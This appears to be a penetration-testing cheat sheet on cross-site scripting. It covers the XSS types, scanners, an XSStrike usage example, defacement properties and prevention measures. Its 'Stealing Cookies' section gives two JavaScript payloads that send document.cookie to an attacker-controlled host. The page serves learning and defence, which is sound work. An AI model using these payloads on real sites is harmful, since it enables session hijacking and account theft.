XSS

Type
Description

Stored (Persistent) XSS

The most critical type of XSS, which occurs when user input is stored on the back-end database and then displayed upon retrieval (e.g., posts or comments)

Reflected (Non-Persistent) XSS

Occurs when user input is displayed on the page after being processed by the backend server, but without being stored (e.g., search result or error message)

DOM-based XSS

Another Non-Persistent XSS type that occurs when user input is directly shown in the browser and is completely processed on the client-side, without reaching the back-end server (e.g., through client-side HTTP parameters or anchor tags)

Automated Discovery

Vulnerability Scanners

  • Nessus

  • Burp Pro

  • ZAP

Other Tools

$ git clone https://github.com/s0md3v/XSStrike.git
$ cd XSStrike
$ pip install -r requirements.txt
$ python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test"

Manual Discovery

Defacing

  • Background Color document.body.style.background

  • Background document.body.background

  • Page Title document.title

  • Page Text DOM.innerHTML

Stealing Cookies

document.location='http://OUR_IP/index.php?c='+document.cookie;
new Image().src='http://OUR_IP/index.php?c='+document.cookie;

XSS Prevention

  • Input Sanitization

  • Input Validation

  • Direct input - dont use user input that directs write to:

    • DOM.innerHTML

    • DOM.outerHTML

    • document.write()

    • document.writeln()

    • document.domain

  • Output HTML Encoding in backend using htmlentities

  • Server Configuration

    • Using HTTPS across the entire domain.

    • Using XSS prevention headers.

    • Using the appropriate Content-Type for the page, like X-Content-Type-Options=nosniff.

    • Using Content-Security-Policy options, like script-src 'self', which only allows locally hosted scripts.

    • Using the HttpOnly and Secure cookie flags to prevent JavaScript from reading cookies and only transport them over HTTPS.

PreviousSQLiNextLFI

Last updated